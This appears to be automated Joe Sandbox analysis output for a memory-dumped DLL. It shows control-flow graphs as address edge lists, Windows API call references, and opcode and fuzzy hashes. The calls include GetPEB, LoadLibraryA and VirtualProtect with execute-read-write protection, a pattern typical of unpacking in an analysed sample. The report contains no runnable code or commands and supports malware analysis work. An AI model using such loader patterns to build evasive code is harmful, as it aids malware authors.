                          control_flow_graph 105 6fd05ca0-6fd05d95 call 6fd0af9c * 2 call 6fd0afc3 * 2 call 6fd064e0 GetPEB 116 6fd05de4 105->116 117 6fd05d97 105->117 119 6fd05de6-6fd05e1d 116->119 118 6fd05d99-6fd05da3 117->118 120 6fd05da5-6fd05dab 118->120 121 6fd05dd6-6fd05dd8 118->121 122 6fd05e23-6fd05e3c 119->122 123 6fd05eba-6fd05f0c GlobalAlloc 119->123 124 6fd05dae-6fd05db5 120->124 127 6fd067e1-6fd067e4 121->127 128 6fd05dde-6fd05de2 121->128 129 6fd05e40-6fd05e4e 122->129 125 6fd05f12-6fd05f2b 123->125 126 6fd05fad 123->126 131 6fd05dc1-6fd05dcd 124->131 132 6fd05db7-6fd05dbd 124->132 133 6fd05f2f-6fd05f3d 125->133 130 6fd05faf-6fd05fce 126->130 127->119 128->116 128->118 134 6fd05e50 129->134 135 6fd05ea3 129->135 145 6fd05fd0 130->145 146 6fd05fe7-6fd05fea 130->146 131->124 140 6fd05dcf-6fd05dd3 131->140 132->131 137 6fd05dbf 132->137 138 6fd05f92 133->138 139 6fd05f3f 133->139 141 6fd05e52-6fd05e58 134->141 142 6fd05ea5-6fd05ea9 135->142 137->131 149 6fd05f94-6fd05f98 138->149 147 6fd05f41-6fd05f47 139->147 140->121 141->141 148 6fd05e5a-6fd05e5c 141->148 143 6fd067c3-6fd067d8 142->143 144 6fd05eaf-6fd05eb4 142->144 144->129 150 6fd05eb6 144->150 151 6fd05fd2-6fd05fe5 145->151 152 6fd05fec 146->152 153 6fd05ffe-6fd06038 146->153 147->147 154 6fd05f49-6fd05f4b 147->154 148->135 155 6fd05e5e-6fd05e64 148->155 157 6fd067a5-6fd067be 149->157 158 6fd05f9e-6fd05fa3 149->158 150->123 151->146 151->151 160 6fd05fee-6fd05ffc 152->160 164 6fd060d9 153->164 165 6fd0603e-6fd06057 153->165 154->138 161 6fd05f4d-6fd05f53 154->161 162 6fd066aa-6fd066af 155->162 163 6fd05e6a-6fd05e6e 155->163 157->130 158->133 159 6fd05fa5-6fd05fa9 158->159 159->126 160->153 160->160 168 6fd066b4 161->168 169 6fd05f59-6fd05f5d 161->169 166 6fd05e90-6fd05e95 162->166 170 6fd05e70-6fd05e86 163->170 167 6fd060db-6fd060ef 164->167 171 6fd0605b-6fd06069 165->171 166->142 176 6fd05e97-6fd05ea1 166->176 178 6fd066be 168->178 172 6fd05f5f-6fd05f75 169->172 170->170 173 6fd05e88-6fd05e8c 170->173 174 6fd0606b 171->174 175 6fd060be 171->175 172->172 179 6fd05f77-6fd05f84 172->179 173->166 180 6fd0606d-6fd06073 174->180 177 6fd060c0-6fd060c4 175->177 176->142 181 6fd06788-6fd067a0 177->181 182 6fd060ca-6fd060cf 177->182 178->181 179->149 183 6fd05f86-6fd05f90 179->183 180->180 184 6fd06075-6fd06077 180->184 181->167 182->171 185 6fd060d1-6fd060d5 182->185 183->149 184->175 186 6fd06079-6fd0607f 184->186 185->164 186->178 187 6fd06085-6fd06089 186->187 188 6fd0608b-6fd060a1 187->188 188->188 189 6fd060a3-6fd060b0 188->189 189->177 190 6fd060b2-6fd060bc 189->190 190->177
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: LibraryLoad_memset
                          • String ID:
                          • API String ID: 2997193564-0
                          • Opcode ID: 46792139d0385141904166d5918f73eb1be585f3f59414ffdcc30d7ab0237199
                          • Instruction ID: c40424980b65ce33ca67e2c882e5eb90586ba5e5822c41d9da163350015a1e96
                          • Opcode Fuzzy Hash: 46792139d0385141904166d5918f73eb1be585f3f59414ffdcc30d7ab0237199
                          • Instruction Fuzzy Hash: 9AE189B1A087069FC768DF19C49062AFBE5FF89314F54892EE89A87351DB30F851CB91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 351 6fd05e70-6fd05e86 351->351 352 6fd05e88-6fd05e8c 351->352 353 6fd05e90-6fd05e95 352->353 354 6fd05ea5-6fd05ea9 353->354 355 6fd05e97-6fd05ea1 353->355 356 6fd067c3-6fd067d8 354->356 357 6fd05eaf-6fd05eb4 354->357 355->354 358 6fd05e40-6fd05e4e 357->358 359 6fd05eb6-6fd05f0c GlobalAlloc 357->359 362 6fd05e50 358->362 363 6fd05ea3 358->363 364 6fd05f12-6fd05f2b 359->364 365 6fd05fad 359->365 366 6fd05e52-6fd05e58 362->366 363->354 368 6fd05f2f-6fd05f3d 364->368 367 6fd05faf-6fd05fce 365->367 366->366 369 6fd05e5a-6fd05e5c 366->369 374 6fd05fd0 367->374 375 6fd05fe7-6fd05fea 367->375 371 6fd05f92 368->371 372 6fd05f3f 368->372 369->363 373 6fd05e5e-6fd05e64 369->373 379 6fd05f94-6fd05f98 371->379 376 6fd05f41-6fd05f47 372->376 377 6fd066aa-6fd066af 373->377 378 6fd05e6a-6fd05e6e 373->378 380 6fd05fd2-6fd05fe5 374->380 381 6fd05fec 375->381 382 6fd05ffe-6fd06038 375->382 376->376 383 6fd05f49-6fd05f4b 376->383 377->353 378->351 384 6fd067a5-6fd067be 379->384 385 6fd05f9e-6fd05fa3 379->385 380->375 380->380 387 6fd05fee-6fd05ffc 381->387 389 6fd060d9 382->389 390 6fd0603e-6fd06057 382->390 383->371 388 6fd05f4d-6fd05f53 383->388 384->367 385->368 386 6fd05fa5-6fd05fa9 385->386 386->365 387->382 387->387 392 6fd066b4 388->392 393 6fd05f59-6fd05f5d 388->393 391 6fd060db-6fd060ef 389->391 394 6fd0605b-6fd06069 390->394 399 6fd066be 392->399 395 6fd05f5f-6fd05f75 393->395 396 6fd0606b 394->396 397 6fd060be 394->397 395->395 400 6fd05f77-6fd05f84 395->400 401 6fd0606d-6fd06073 396->401 398 6fd060c0-6fd060c4 397->398 402 6fd06788-6fd067a0 398->402 403 6fd060ca-6fd060cf 398->403 399->402 400->379 404 6fd05f86-6fd05f90 400->404 401->401 405 6fd06075-6fd06077 401->405 402->391 403->394 406 6fd060d1-6fd060d5 403->406 404->379 405->397 407 6fd06079-6fd0607f 405->407 406->389 407->399 408 6fd06085-6fd06089 407->408 409 6fd0608b-6fd060a1 408->409 409->409 410 6fd060a3-6fd060b0 409->410 410->398 411 6fd060b2-6fd060bc 410->411 411->398
                          APIs
                          • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FD05ECA
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: AllocGlobal
                          • String ID:
                          • API String ID: 3761449716-0
                          • Opcode ID: 344e3246a208d30ec22637ae0239e19a14acbfe04028b270e20c7fb495bd3c64
                          • Instruction ID: a2f183c709bb0e5d2af4f304f41226401f6863e33681f8749eb95aa6125ba79e
                          • Opcode Fuzzy Hash: 344e3246a208d30ec22637ae0239e19a14acbfe04028b270e20c7fb495bd3c64
                          • Instruction Fuzzy Hash: 6CA1A270608306CFC758EF2CC19022ABBE2BF8A304F14856EE99687356D771F861CB91

                          Control-flow Graph

                          APIs
                          • RtlEnterCriticalSection.NTDLL(6FD332EC), ref: 6FD0BC61
                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6FD332D0,6FD332D0,?,6FD0C0A4,00000004,6FD0AF00,6FD06DDD,6FD068AD,?,6FD14902,?), ref: 6FD0BCB7
                          • GlobalHandle.KERNEL32(00CFD188), ref: 6FD0BCC0
                          • GlobalUnlock.KERNEL32(00000000), ref: 6FD0BCCA
                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6FD0BCE3
                          • GlobalHandle.KERNEL32(00CFD188), ref: 6FD0BCF5
                          • GlobalLock.KERNEL32(00000000), ref: 6FD0BCFC
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FD0BD05
                          • GlobalLock.KERNEL32(00000000), ref: 6FD0BD11
                          • _memset.LIBCMT ref: 6FD0BD2B
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FD0BD59
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                          • String ID:
                          • API String ID: 496899490-0
                          • Opcode ID: a084fb59197e63c3fd56d0168d952e4aa6fc5662fe72e4394e64a33d24703728
                          • Instruction ID: 910216be7f965600740ef761079ccaf246e9f899a612c70e97bd9f5bf2cd9640
                          • Opcode Fuzzy Hash: a084fb59197e63c3fd56d0168d952e4aa6fc5662fe72e4394e64a33d24703728
                          • Instruction Fuzzy Hash: 2131A172608B04AFEB619F74C849A5EB7F9FF45310B04492AE652D7680DB30F850CBA0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 77 6fd064e0-6fd064e8 78 6fd064ea-6fd06501 77->78 78->78 79 6fd06503-6fd06513 78->79 80 6fd06515-6fd06522 79->80 81 6fd06526-6fd06551 79->81 80->81 82 6fd065f1 81->82 83 6fd06557-6fd06568 81->83 84 6fd065f3-6fd06661 LoadLibraryA VirtualProtect call 6fd067f8 VirtualProtect 82->84 85 6fd0656c-6fd06577 83->85 94 6fd06682-6fd066a9 84->94 95 6fd06663 84->95 87 6fd06579 85->87 88 6fd065da 85->88 91 6fd0657b-6fd06580 87->91 90 6fd065dc-6fd065e0 88->90 92 6fd06704-6fd06716 90->92 93 6fd065e6-6fd065eb 90->93 91->91 96 6fd06582-6fd06584 91->96 92->84 93->82 93->85 97 6fd06667-6fd06680 95->97 96->88 98 6fd06586-6fd0658c 96->98 97->94 97->97 100 6fd06592-6fd0659c 98->100 101 6fd066fa 98->101 102 6fd065a0-6fd065b7 100->102 101->92 102->102 103 6fd065b9-6fd065ca 102->103 103->90 104 6fd065cc-6fd065d8 103->104 104->90
                          APIs
                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FD06602
                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FD0663B
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: LibraryLoadProtectVirtual
                          • String ID:
                          • API String ID: 3279857687-0
                          • Opcode ID: 917a237bfb3f5a68118ca95ab0a384bbaac2edd0f2c4cf68edb7c87aea01ee17
                          • Instruction ID: 1afc88c41837ce16ba9b15667f4f4162bcc78a2feaa6732fe27d991f4bf574aa
                          • Opcode Fuzzy Hash: 917a237bfb3f5a68118ca95ab0a384bbaac2edd0f2c4cf68edb7c87aea01ee17
                          • Instruction Fuzzy Hash: 2951F2316083568FC715DF28C88062EFBE6BFCA308F09896EE88547316C630F946CB91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 191 6fd06750-6fd06762 ReadFile 193 6fd061f0-6fd06207 191->193 194 6fd0630a-6fd06323 191->194 195 6fd06325-6fd06329 194->195 196 6fd0634d-6fd06368 194->196 197 6fd06738 195->197 198 6fd0632f 195->198 199 6fd0636a 196->199 200 6fd063cb 196->200 197->191 203 6fd06331-6fd0633c 198->203 204 6fd0636c-6fd06372 199->204 202 6fd063cd-6fd063ee 200->202 205 6fd066dc 202->205 203->203 206 6fd0633e-6fd06347 203->206 204->204 207 6fd06374-6fd06376 204->207 205->197 206->196 208 6fd06349 206->208 207->200 209 6fd06378-6fd0637e 207->209 208->196 209->205 210 6fd06384-6fd0638d 209->210 211 6fd06391-6fd063a8 210->211 211->211 212 6fd063aa-6fd063ba 211->212 212->202 213 6fd063bc-6fd063c9 212->213 213->202
                          APIs
                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FD2C168), ref: 6FD06300
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: f3192eb3377bcc566f264aef7450a7b8a93635f05b551d753e5ad24fc90f6c71
                          • Instruction ID: 884f8abea754de309124dd6b0a386a480eb97d6324327e9ce30566a4b2b5d1e7
                          • Opcode Fuzzy Hash: f3192eb3377bcc566f264aef7450a7b8a93635f05b551d753e5ad24fc90f6c71
                          • Instruction Fuzzy Hash: 4E41CF31A087068FD754EF19C88066EB7E2FFC6324F0C896DE88987316D631F8958B91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 214 6fd062d0-6fd062d5 215 6fd06742-6fd0674e 214->215 216 6fd062db-6fd062e0 214->216 217 6fd062e2-6fd062f1 216->217 218 6fd0626d-6fd0627b 216->218 223 6fd062f3-6fd06304 ReadFile 217->223 220 6fd0627d 218->220 221 6fd062cf 218->221 224 6fd0627f-6fd06284 220->224 222 6fd062d1-6fd062d5 221->222 222->215 222->216 225 6fd061f0-6fd06207 223->225 226 6fd0630a-6fd06323 223->226 224->224 227 6fd06286-6fd06288 224->227 228 6fd06325-6fd06329 226->228 229 6fd0634d-6fd06368 226->229 227->221 230 6fd0628a-6fd06290 227->230 231 6fd06738-6fd06762 228->231 232 6fd0632f 228->232 233 6fd0636a 229->233 234 6fd063cb 229->234 235 6fd066d2 230->235 236 6fd06296-6fd0629a 230->236 231->223 239 6fd06331-6fd0633c 232->239 240 6fd0636c-6fd06372 233->240 238 6fd063cd-6fd063ee 234->238 235->215 241 6fd0629c-6fd062b2 236->241 242 6fd066dc 238->242 239->239 243 6fd0633e-6fd06347 239->243 240->240 245 6fd06374-6fd06376 240->245 241->241 246 6fd062b4-6fd062c1 241->246 242->231 243->229 247 6fd06349 243->247 245->234 248 6fd06378-6fd0637e 245->248 246->222 249 6fd062c3-6fd062cd 246->249 247->229 248->242 250 6fd06384-6fd0638d 248->250 249->222 251 6fd06391-6fd063a8 250->251 251->251 252 6fd063aa-6fd063ba 251->252 252->238 253 6fd063bc-6fd063c9 252->253 253->238
                          APIs
                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FD2C168), ref: 6FD06300
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: bd3fd9a4f7fbfd08baa23b04c99301b051abc7237c59f826276b2ea5bb59371f
                          • Instruction ID: a4e2b7c2de36f48ba12a8417b4f347f5b5ef29eaa0f07ba591aecd558dea1d52
                          • Opcode Fuzzy Hash: bd3fd9a4f7fbfd08baa23b04c99301b051abc7237c59f826276b2ea5bb59371f
                          • Instruction Fuzzy Hash: DF31C031A087068FC754EF19C88066EB7E2FFC6324F09896DE89557316D630F895CB81

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 254 6fd0c050-6fd0c068 call 6fd150c9 257 6fd0c06a call 6fd06dc1 254->257 258 6fd0c06f-6fd0c072 254->258 257->258 260 6fd0c074-6fd0c07c 258->260 261 6fd0c0aa-6fd0c0bb call 6fd0ba5b 258->261 262 6fd0c07e-6fd0c09d call 6fd0bd66 260->262 263 6fd0c09f call 6fd0bc4e 260->263 270 6fd0c0d0-6fd0c0d7 call 6fd151a1 261->270 271 6fd0c0bd-6fd0c0cb call 6fd0be0d 261->271 262->257 262->263 269 6fd0c0a4-6fd0c0a8 263->269 269->257 269->261 271->270
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6FD0C057
                            • Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
                            • Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: H_prolog3$Exception@8Throw
                          • String ID:
                          • API String ID: 2489616738-0
                          • Opcode ID: ac74f33d6097ed4c06fd5138f65564829909ad52dca787c2e2c5b309ad49d10a
                          • Instruction ID: b168649ccc66d07a2bffa88af6555e9dbc1e223842ba2c863e4562b04e87cdf6
                          • Opcode Fuzzy Hash: ac74f33d6097ed4c06fd5138f65564829909ad52dca787c2e2c5b309ad49d10a
                          • Instruction Fuzzy Hash: 57018835604703CBEBA8BF68881126D36A2AF42324F10842CD552CB2D0DB31F941EB34

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 276 6fd060f0-6fd06139 CreateFileW 277 6fd061de-6fd06780 276->277 278 6fd0613f-6fd067e4 276->278 284 6fd05e23-6fd05e3c 278->284 285 6fd05eba-6fd05f0c GlobalAlloc 278->285 289 6fd05e40-6fd05e4e 284->289 287 6fd05f12-6fd05f2b 285->287 288 6fd05fad 285->288 292 6fd05f2f-6fd05f3d 287->292 291 6fd05faf-6fd05fce 288->291 293 6fd05e50 289->293 294 6fd05ea3 289->294 302 6fd05fd0 291->302 303 6fd05fe7-6fd05fea 291->303 296 6fd05f92 292->296 297 6fd05f3f 292->297 298 6fd05e52-6fd05e58 293->298 299 6fd05ea5-6fd05ea9 294->299 306 6fd05f94-6fd05f98 296->306 304 6fd05f41-6fd05f47 297->304 298->298 305 6fd05e5a-6fd05e5c 298->305 300 6fd067c3-6fd067d8 299->300 301 6fd05eaf-6fd05eb4 299->301 301->289 307 6fd05eb6 301->307 308 6fd05fd2-6fd05fe5 302->308 309 6fd05fec 303->309 310 6fd05ffe-6fd06038 303->310 304->304 311 6fd05f49-6fd05f4b 304->311 305->294 312 6fd05e5e-6fd05e64 305->312 314 6fd067a5-6fd067be 306->314 315 6fd05f9e-6fd05fa3 306->315 307->285 308->303 308->308 317 6fd05fee-6fd05ffc 309->317 321 6fd060d9 310->321 322 6fd0603e-6fd06057 310->322 311->296 318 6fd05f4d-6fd05f53 311->318 319 6fd066aa-6fd066af 312->319 320 6fd05e6a-6fd05e6e 312->320 314->291 315->292 316 6fd05fa5-6fd05fa9 315->316 316->288 317->310 317->317 325 6fd066b4 318->325 326 6fd05f59-6fd05f5d 318->326 323 6fd05e90-6fd05e95 319->323 327 6fd05e70-6fd05e86 320->327 324 6fd060db-6fd060ef 321->324 328 6fd0605b-6fd06069 322->328 323->299 333 6fd05e97-6fd05ea1 323->333 335 6fd066be 325->335 329 6fd05f5f-6fd05f75 326->329 327->327 330 6fd05e88-6fd05e8c 327->330 331 6fd0606b 328->331 332 6fd060be 328->332 329->329 336 6fd05f77-6fd05f84 329->336 330->323 337 6fd0606d-6fd06073 331->337 334 6fd060c0-6fd060c4 332->334 333->299 338 6fd06788-6fd067a0 334->338 339 6fd060ca-6fd060cf 334->339 335->338 336->306 340 6fd05f86-6fd05f90 336->340 337->337 341 6fd06075-6fd06077 337->341 338->324 339->328 342 6fd060d1-6fd060d5 339->342 340->306 341->332 343 6fd06079-6fd0607f 341->343 342->321 343->335 344 6fd06085-6fd06089 343->344 345 6fd0608b-6fd060a1 344->345 345->345 346 6fd060a3-6fd060b0 345->346 346->334 347 6fd060b2-6fd060bc 346->347 347->334
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FD060F6
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: af6a4291a1654461d04bff4a8120f5a0978164dc51907d46cb4f7bb932d00ba8
                          • Instruction ID: e6bce4128bc6622263ffbde531627d11e7e44d20ac9991212d224f1dd8acbcb4
                          • Opcode Fuzzy Hash: af6a4291a1654461d04bff4a8120f5a0978164dc51907d46cb4f7bb932d00ba8
                          • Instruction Fuzzy Hash: DA01FBB1D087019FC718CF0AC89090ABBE6FFC9314F16852DA84897316C730E851CF99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 348 6fd1a6f4-6fd1a716 HeapCreate 349 6fd1a718-6fd1a719 348->349 350 6fd1a71a-6fd1a723 348->350
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FD14776,00000001,?,?,?,6FD148EF,?,?,?,6FD2E848,0000000C,6FD149AA), ref: 6FD1A709
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          • API String ID: 10892065-0
                          • Opcode ID: 219b35e7ad44f793fe3616627bd9dceacea5b7a18166466d9c925d7a6dbc72cb
                          • Instruction ID: 5f7e23bb1b463f254010eaac0e72fcdef267dfff8b9477e3fc8b28db35860ff5
                          • Opcode Fuzzy Hash: 219b35e7ad44f793fe3616627bd9dceacea5b7a18166466d9c925d7a6dbc72cb
                          • Instruction Fuzzy Hash: D8D02E335487489AEB109F706C087223BEC93823A2F088432FA0CC6080E570E1A0CA04
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6FD07498
                          • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6FD076D5,?,00000000,?,00000000,00000104,00000000,?,6FD2BEF4,00000000), ref: 6FD074D6
                            • Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
                            • Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4
                          • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6FD07546
                          • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6FD0756D
                          • CharUpperW.USER32(00000000), ref: 6FD075A0
                          • FindFirstFileW.KERNEL32(?,?), ref: 6FD075BC
                          • FindClose.KERNEL32(00000000), ref: 6FD075C8
                          • lstrlenW.KERNEL32(?), ref: 6FD075E6
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                          • String ID:
                          • API String ID: 624941980-0
                          • Opcode ID: 9b32a05e6cf2216c0f4f0ff324d808985927eef71fdd12f8cea080963dd0b5eb
                          • Instruction ID: 84c93f5c02dc926cd22eff63cdde5e4d026c27a0684510989a9c9071a506591b
                          • Opcode Fuzzy Hash: 9b32a05e6cf2216c0f4f0ff324d808985927eef71fdd12f8cea080963dd0b5eb
                          • Instruction Fuzzy Hash: C7417271908715ABEF95BF64CC8CBEE7678AF01318F0402D9E9199A190DB35BA94CF60
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: _memset
                          • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                          • API String ID: 2102423945-1093365818
                          • Opcode ID: 96b6074642d2bc0ca6168865fbb75f1c3dea0c6ca264b9291959e08e75da891c
                          • Instruction ID: f68ecc45204e7d5cdc1a1e8bb3a02ced3ab8de373794504c8b2b77e249281f31
                          • Opcode Fuzzy Hash: 96b6074642d2bc0ca6168865fbb75f1c3dea0c6ca264b9291959e08e75da891c
                          • Instruction Fuzzy Hash: 4B918271C0430DEFEB80DFA8D585BDEBBF8AF45389F108166E918E6180E775A644C7A0
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 6FD17C6C
